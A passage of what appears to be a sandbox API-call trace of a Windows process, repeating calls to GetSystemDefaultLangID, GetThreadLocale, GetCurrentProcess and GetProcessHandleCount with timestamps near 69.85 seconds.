GetSystemDefaultLangID () returned 0x2730409 [0069.844] GetThreadLocale () returned 0x409 [0069.844] GetCurrentProcess () returned 0xffffffff [0069.844] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.844] GetSystemDefaultLangID () returned 0x2730409 [0069.844] GetThreadLocale () returned 0x409 [0069.844] GetCurrentProcess () returned 0xffffffff [0069.844] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.844] GetSystemDefaultLangID () returned 0x2730409 [0069.844] GetThreadLocale () returned 0x409 [0069.845] GetCurrentProcess () returned 0xffffffff [0069.845] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.845] GetSystemDefaultLangID () returned 0x2730409 [0069.845] GetThreadLocale () returned 0x409 [0069.845] GetCurrentProcess () returned 0xffffffff [0069.845] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.845] GetSystemDefaultLangID () returned 0x2730409 [0069.845] GetThreadLocale () returned 0x409 [0069.845] GetCurrentProcess () returned 0xffffffff [0069.845] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.845] GetSystemDefaultLangID () returned 0x2730409 [0069.845] GetThreadLocale () returned 0x409 [0069.845] GetCurrentProcess () returned 0xffffffff [0069.845] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.845] GetSystemDefaultLangID () returned 0x2730409 [0069.845] GetThreadLocale () returned 0x409 [0069.845] GetCurrentProcess () returned 0xffffffff [0069.845] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.845] GetSystemDefaultLangID () returned 0x2730409 [0069.845] GetThreadLocale () returned 0x409 [0069.845] GetCurrentProcess () returned 0xffffffff [0069.845] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.845] GetSystemDefaultLangID () returned 0x2730409 [0069.845] GetThreadLocale () returned 0x409 [0069.845] GetCurrentProcess () returned 0xffffffff [0069.845] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.845] GetSystemDefaultLangID () returned 0x2730409 [0069.846] GetThreadLocale () returned 0x409 [0069.846] GetCurrentProcess () returned 0xffffffff [0069.846] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.846] GetSystemDefaultLangID () returned 0x2730409 [0069.846] GetThreadLocale () returned 0x409 [0069.846] GetCurrentProcess () returned 0xffffffff [0069.846] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.846] GetSystemDefaultLangID () returned 0x2730409 [0069.846] GetThreadLocale () returned 0x409 [0069.846] GetCurrentProcess () returned 0xffffffff [0069.846] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.846] GetSystemDefaultLangID () returned 0x2730409 [0069.846] GetThreadLocale () returned 0x409 [0069.846] GetCurrentProcess () returned 0xffffffff [0069.846] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.846] GetSystemDefaultLangID () returned 0x2730409 [0069.846] GetThreadLocale () returned 0x409 [0069.846] GetCurrentProcess () returned 0xffffffff [0069.846] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.846] GetSystemDefaultLangID () returned 0x2730409 [0069.846] GetThreadLocale () returned 0x409 [0069.846] GetCurrentProcess () returned 0xffffffff [0069.846] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.846] GetSystemDefaultLangID () returned 0x2730409 [0069.846] GetThreadLocale () returned 0x409 [0069.846] GetCurrentProcess () returned 0xffffffff [0069.846] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.846] GetSystemDefaultLangID () returned 0x2730409 [0069.846] GetThreadLocale () returned 0x409 [0069.846] GetCurrentProcess () returned 0xffffffff [0069.846] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.847] GetSystemDefaultLangID () returned 0x2730409 [0069.847] GetThreadLocale () returned 0x409 [0069.847] GetCurrentProcess () returned 0xffffffff [0069.847] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.847] GetSystemDefaultLangID () returned 0x2730409 [0069.847] GetThreadLocale () returned 0x409 [0069.847] GetCurrentProcess () returned 0xffffffff [0069.847] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.847] GetSystemDefaultLangID () returned 0x2730409 [0069.847] GetThreadLocale () returned 0x409 [0069.847] GetCurrentProcess () returned 0xffffffff [0069.847] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.847] GetSystemDefaultLangID () returned 0x2730409 [0069.847] GetThreadLocale () returned 0x409 [0069.847] GetCurrentProcess () returned 0xffffffff [0069.847] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.847] GetSystemDefaultLangID () returned 0x2730409 [0069.847] GetThreadLocale () returned 0x409 [0069.847] GetCurrentProcess () returned 0xffffffff [0069.847] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.847] GetSystemDefaultLangID () returned 0x2730409 [0069.847] GetThreadLocale () returned 0x409 [0069.847] GetCurrentProcess () returned 0xffffffff [0069.847] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.847] GetSystemDefaultLangID () returned 0x2730409 [0069.847] GetThreadLocale () returned 0x409 [0069.847] GetCurrentProcess () returned 0xffffffff [0069.847] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.847] GetSystemDefaultLangID () returned 0x2730409 [0069.847] GetThreadLocale () returned 0x409 [0069.847] GetCurrentProcess () returned 0xffffffff [0069.848] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.848] GetSystemDefaultLangID () returned 0x2730409 [0069.848] GetThreadLocale () returned 0x409 [0069.848] GetCurrentProcess () returned 0xffffffff [0069.848] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.848] GetSystemDefaultLangID () returned 0x2730409 [0069.848] GetThreadLocale () returned 0x409 [0069.848] GetCurrentProcess () returned 0xffffffff [0069.848] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.848] GetSystemDefaultLangID () returned 0x2730409 [0069.848] GetThreadLocale () returned 0x409 [0069.848] GetCurrentProcess () returned 0xffffffff [0069.848] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.848] GetSystemDefaultLangID () returned 0x2730409 [0069.848] GetThreadLocale () returned 0x409 [0069.848] GetCurrentProcess () returned 0xffffffff [0069.848] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.849] GetSystemDefaultLangID () returned 0x2730409 [0069.850] GetThreadLocale () returned 0x409 [0069.850] GetCurrentProcess () returned 0xffffffff [0069.850] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.850] GetSystemDefaultLangID () returned 0x2730409 [0069.850] GetThreadLocale () returned 0x409 [0069.850] GetCurrentProcess () returned 0xffffffff [0069.850] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.850] GetSystemDefaultLangID () returned 0x2730409 [0069.850] GetThreadLocale () returned 0x409 [0069.850] GetCurrentProcess () returned 0xffffffff [0069.850] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.850] GetSystemDefaultLangID () returned 0x2730409 [0069.850] GetThreadLocale () returned 0x409 [0069.850] GetCurrentProcess () returned 0xffffffff [0069.850] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.850] GetSystemDefaultLangID () returned 0x2730409 [0069.850] GetThreadLocale () returned 0x409 [0069.850] GetCurrentProcess () returned 0xffffffff [0069.850] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.850] GetSystemDefaultLangID () returned 0x2730409 [0069.850] GetThreadLocale () returned 0x409 [0069.850] GetCurrentProcess () returned 0xffffffff [0069.850] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.850] GetSystemDefaultLangID () returned 0x2730409 [0069.850] GetThreadLocale () returned 0x409 [0069.850] GetCurrentProcess () returned 0xffffffff [0069.850] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.850] GetSystemDefaultLangID () returned 0x2730409 [0069.850] GetThreadLocale () returned 0x409 [0069.850] GetCurrentProcess () returned 0xffffffff [0069.850] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.850] GetSystemDefaultLangID () returned 0x2730409 [0069.850] GetThreadLocale () returned 0x409 [0069.851] GetCurrentProcess () returned 0xffffffff [0069.851] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.851] GetSystemDefaultLangID () returned 0x2730409 [0069.851] GetThreadLocale () returned 0x409 [0069.851] GetCurrentProcess () returned 0xffffffff [0069.851] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.851] GetSystemDefaultLangID () returned 0x2730409 [0069.851] GetThreadLocale () returned 0x409 [0069.851] GetCurrentProcess () returned 0xffffffff [0069.851] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.851] GetSystemDefaultLangID () returned 0x2730409 [0069.851] GetThreadLocale () returned 0x409 [0069.851] GetCurrentProcess () returned 0xffffffff [0069.851] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.851] GetSystemDefaultLangID () returned 0x2730409 [0069.851] GetThreadLocale () returned 0x409 [0069.851] GetCurrentProcess () returned 0xffffffff [0069.851] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.851] GetSystemDefaultLangID () returned 0x2730409 [0069.851] GetThreadLocale () returned 0x409 [0069.851] GetCurrentProcess () returned 0xffffffff [0069.851] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.851] GetSystemDefaultLangID () returned 0x2730409 [0069.851] GetThreadLocale () returned 0x409 [0069.851] GetCurrentProcess () returned 0xffffffff [0069.851] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.851] GetSystemDefaultLangID () returned 0x2730409 [0069.851] GetThreadLocale () returned 0x409 [0069.851] GetCurrentProcess () returned 0xffffffff [0069.851] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.851] GetSystemDefaultLangID () returned 0x2730409 [0069.851] GetThreadLocale () returned 0x409 [0069.851] GetCurrentProcess () returned 0xffffffff [0069.851] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.851] GetSystemDefaultLangID () returned 0x2730409 [0069.852] GetThreadLocale () returned 0x409 [0069.852] GetCurrentProcess () returned 0xffffffff [0069.852] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.852] GetSystemDefaultLangID () returned 0x2730409 [0069.852] GetThreadLocale () returned 0x409 [0069.852] GetCurrentProcess () returned 0xffffffff [0069.852] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.852] GetSystemDefaultLangID () returned 0x2730409 [0069.852] GetThreadLocale () returned 0x409 [0069.852] GetCurrentProcess () returned 0xffffffff [0069.852] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.852] GetSystemDefaultLangID () returned 0x2730409 [0069.852] GetThreadLocale () returned 0x409 [0069.852] GetCurrentProcess () returned 0xffffffff [0069.852] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.852] GetSystemDefaultLangID () returned 0x2730409 [0069.852] GetThreadLocale () returned 0x409 [0069.852] GetCurrentProcess () returned 0xffffffff [0069.852] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.852] GetSystemDefaultLangID () returned 0x2730409 [0069.852] GetThreadLocale () returned 0x409 [0069.852] GetCurrentProcess () returned 0xffffffff [0069.852] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.852] GetSystemDefaultLangID () returned 0x2730409 [0069.852] GetThreadLocale () returned 0x409 [0069.852] GetCurrentProcess () returned 0xffffffff [0069.852] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.852] GetSystemDefaultLangID () returned 0x2730409 [0069.852] GetThreadLocale () returned 0x409 [0069.852] GetCurrentProcess () returned 0xffffffff [0069.852] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.852] GetSystemDefaultLangID () returned 0x2730409 [0069.852] GetThreadLocale () returned 0x409 [0069.852] GetCurrentProcess () returned 0xffffffff [0069.853] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.853] GetSystemDefaultLangID () returned 0x2730409 [0069.853] GetThreadLocale () returned 0x409 [0069.853] GetCurrentProcess () returned 0xffffffff [0069.853] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.853] GetSystemDefaultLangID () returned 0x2730409 [0069.853] GetThreadLocale () returned 0x409 [0069.853] GetCurrentProcess () returned 0xffffffff [0069.853] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.853] GetSystemDefaultLangID () returned 0x2730409 [0069.853] GetThreadLocale () returned 0x409 [0069.853] GetCurrentProcess () returned 0xffffffff [0069.853] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.853] GetSystemDefaultLangID () returned 0x2730409 [0069.853] GetThreadLocale () returned 0x409 [0069.853] GetCurrentProcess () returned 0xffffffff [0069.853] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.853] GetSystemDefaultLangID () returned 0x2730409 [0069.853] GetThreadLocale () returned 0x409 [0069.853] GetCurrentProcess () returned 0xffffffff [0069.853] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.853] GetSystemDefaultLangID () returned 0x2730409 [0069.853] GetThreadLocale () returned 0x409 [0069.853] GetCurrentProcess () returned 0xffffffff [0069.853] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.853] GetSystemDefaultLangID () returned 0x2730409 [0069.853] GetThreadLocale () returned 0x409 [0069.853] GetCurrentProcess () returned 0xffffffff [0069.853] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.853] GetSystemDefaultLangID () returned 0x2730409 [0069.853] GetThreadLocale () returned 0x409 [0069.853] GetCurrentProcess () returned 0xffffffff [0069.854] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.854] GetSystemDefaultLangID () returned 0x2730409 [0069.854] GetThreadLocale () returned 0x409 [0069.854] GetCurrentProcess () returned 0xffffffff [0069.854] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.854] GetSystemDefaultLangID () returned 0x2730409 [0069.854] GetThreadLocale () returned 0x409 [0069.854] GetCurrentProcess () returned 0xffffffff [0069.854] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.854] GetSystemDefaultLangID () returned 0x2730409 [0069.854] GetThreadLocale () returned 0x409 [0069.854] GetCurrentProcess () returned 0xffffffff [0069.854] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.854] GetSystemDefaultLangID () returned 0x2730409 [0069.854] GetThreadLocale () returned 0x409 [0069.854] GetCurrentProcess () returned 0xffffffff [0069.854] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.854] GetSystemDefaultLangID () returned 0x2730409 [0069.854] GetThreadLocale () returned 0x409 [0069.854] GetCurrentProcess () returned 0xffffffff [0069.854] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.854] GetSystemDefaultLangID () returned 0x2730409 [0069.854] GetThreadLocale () returned 0x409 [0069.854] GetCurrentProcess () returned 0xffffffff [0069.854] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.854] GetSystemDefaultLangID () returned 0x2730409 [0069.854] GetThreadLocale () returned 0x409 [0069.854] GetCurrentProcess () returned 0xffffffff [0069.854] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.854] GetSystemDefaultLangID () returned 0x2730409 [0069.854] GetThreadLocale () returned 0x409 [0069.854] GetCurrentProcess () returned 0xffffffff [0069.855] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.855] GetSystemDefaultLangID () returned 0x2730409 [0069.855] GetThreadLocale () returned 0x409 [0069.855] GetCurrentProcess () returned 0xffffffff [0069.855] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.855] GetSystemDefaultLangID () returned 0x2730409 [0069.855] GetThreadLocale () returned 0x409 [0069.855] GetCurrentProcess () returned 0xffffffff [0069.855] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.855] GetSystemDefaultLangID () returned 0x2730409 [0069.855] GetThreadLocale () returned 0x409 [0069.855] GetCurrentProcess () returned 0xffffffff [0069.855] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.855] GetSystemDefaultLangID () returned 0x2730409 [0069.855] GetThreadLocale () returned 0x409 [0069.855] GetCurrentProcess () returned 0xffffffff [0069.855] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.855] GetSystemDefaultLangID () returned 0x2730409 [0069.855] GetThreadLocale () returned 0x409 [0069.855] GetCurrentProcess () returned 0xffffffff [0069.855] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.855] GetSystemDefaultLangID () returned 0x2730409 [0069.855] GetThreadLocale () returned 0x409 [0069.855] GetCurrentProcess () returned 0xffffffff [0069.855] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.855] GetSystemDefaultLangID () returned 0x2730409 [0069.855] GetThreadLocale () returned 0x409 [0069.855] GetCurrentProcess () returned 0xffffffff [0069.855] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.855] GetSystemDefaultLangID () returned 0x2730409 [0069.855] GetThreadLocale () returned 0x409 [0069.855] GetCurrentProcess () returned 0xffffffff [0069.855] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.855] GetSystemDefaultLangID () returned 0x2730409 [0069.856] GetThreadLocale () returned 0x409 [0069.856] GetCurrentProcess () returned 0xffffffff [0069.856] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.856] GetSystemDefaultLangID () returned 0x2730409 [0069.856] GetThreadLocale () returned 0x409 [0069.856] GetCurrentProcess () returned 0xffffffff [0069.856] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.856] GetSystemDefaultLangID () returned 0x2730409 [0069.856] GetThreadLocale () returned 0x409 [0069.856] GetCurrentProcess () returned 0xffffffff [0069.856] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.856] GetSystemDefaultLangID () returned 0x2730409 [0069.856] GetThreadLocale () returned 0x409 [0069.856] GetCurrentProcess () returned 0xffffffff [0069.856] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.856] GetSystemDefaultLangID () returned 0x2730409 [0069.856] GetThreadLocale () returned 0x409 [0069.856] GetCurrentProcess () returned 0xffffffff [0069.856] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.856] GetSystemDefaultLangID () returned 0x2730409 [0069.856] GetThreadLocale () returned 0x409 [0069.856] GetCurrentProcess () returned 0xffffffff [0069.856] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.856] GetSystemDefaultLangID () returned 0x2730409 [0069.856] GetThreadLocale () returned 0x409 [0069.856] GetCurrentProcess () returned 0xffffffff [0069.856] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.856] GetSystemDefaultLangID () returned 0x2730409 [0069.856] GetThreadLocale () returned 0x409 [0069.856] GetCurrentProcess () returned 0xffffffff [0069.856] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.856] GetSystemDefaultLangID () returned 0x2730409 [0069.856] GetThreadLocale () returned 0x409 [0069.856] GetCurrentProcess () returned 0xffffffff [0069.856] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.857] GetSystemDefaultLangID () returned 0x2730409 [0069.857] GetThreadLocale () returned 0x409 [0069.857] GetCurrentProcess () returned 0xffffffff [0069.857] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.857] GetSystemDefaultLangID () returned 0x2730409 [0069.857] GetThreadLocale () returned 0x409 [0069.857] GetCurrentProcess () returned 0xffffffff [0069.857] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.857] GetSystemDefaultLangID () returned 0x2730409 [0069.857] GetThreadLocale () returned 0x409 [0069.857] GetCurrentProcess () returned 0xffffffff [0069.857] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.857] GetSystemDefaultLangID () returned 0x2730409 [0069.857] GetThreadLocale () returned 0x409 [0069.857] GetCurrentProcess () returned 0xffffffff [0069.857] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.857] GetSystemDefaultLangID () returned 0x2730409 [0069.857] GetThreadLocale () returned 0x409 [0069.857] GetCurrentProcess () returned 0xffffffff [0069.857] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.857] GetSystemDefaultLangID () returned 0x2730409 [0069.857] GetThreadLocale () returned 0x409 [0069.857] GetCurrentProcess () returned 0xffffffff [0069.857] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.857] GetSystemDefaultLangID () returned 0x2730409 [0069.857] GetThreadLocale () returned 0x409 [0069.857] GetCurrentProcess () returned 0xffffffff [0069.857] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.857] GetSystemDefaultLangID () returned 0x2730409 [0069.857] GetThreadLocale () returned 0x409 [0069.857] GetCurrentProcess () returned 0xffffffff [0069.857] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.858] GetSystemDefaultLangID () returned 0x2730409 [0069.858] GetThreadLocale () returned 0x409 [0069.858] GetCurrentProcess () returned 0xffffffff [0069.858] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.858] GetSystemDefaultLangID () returned 0x2730409 [0069.858] GetThreadLocale () returned 0x409 [0069.858] GetCurrentProcess () returned 0xffffffff [0069.858] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.858] GetSystemDefaultLangID () returned 0x2730409 [0069.858] GetThreadLocale () returned 0x409 [0069.858] GetCurrentProcess () returned 0xffffffff [0069.858] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.858] GetSystemDefaultLangID () returned 0x2730409 [0069.858] GetThreadLocale () returned 0x409 [0069.858] GetCurrentProcess () returned 0xffffffff [0069.858] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.858] GetSystemDefaultLangID () returned 0x2730409 [0069.858] GetThreadLocale () returned 0x409 [0069.858] GetCurrentProcess () returned 0xffffffff [0069.858] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.858] GetSystemDefaultLangID () returned 0x2730409 [0069.858] GetThreadLocale () returned 0x409 [0069.858] GetCurrentProcess () returned 0xffffffff [0069.858] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.858] GetSystemDefaultLangID () returned 0x2730409 [0069.858] GetThreadLocale () returned 0x409 [0069.858] GetCurrentProcess () returned 0xffffffff [0069.858] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.858] GetSystemDefaultLangID () returned 0x2730409 [0069.858] GetThreadLocale () returned 0x409 [0069.858] GetCurrentProcess () returned 0xffffffff [0069.858] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.859] GetSystemDefaultLangID () returned 0x2730409 [0069.859] GetThreadLocale () returned 0x409 [0069.859] GetCurrentProcess () returned 0xffffffff [0069.859] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.859] GetSystemDefaultLangID () returned 0x2730409 [0069.859] GetThreadLocale () returned 0x409 [0069.859] GetCurrentProcess () returned 0xffffffff [0069.859] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.859] GetSystemDefaultLangID () returned 0x2730409 [0069.859] GetThreadLocale () returned 0x409 [0069.859] GetCurrentProcess () returned 0xffffffff [0069.859] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.859] GetSystemDefaultLangID () returned 0x2730409 [0069.859] GetThreadLocale () returned 0x409 [0069.859] GetCurrentProcess () returned 0xffffffff [0069.859] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.859] GetSystemDefaultLangID () returned 0x2730409 [0069.859] GetThreadLocale () returned 0x409 [0069.859] GetCurrentProcess () returned 0xffffffff [0069.859] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.859] GetSystemDefaultLangID () returned 0x2730409 [0069.859] GetThreadLocale () returned 0x409 [0069.859] GetCurrentProcess () returned 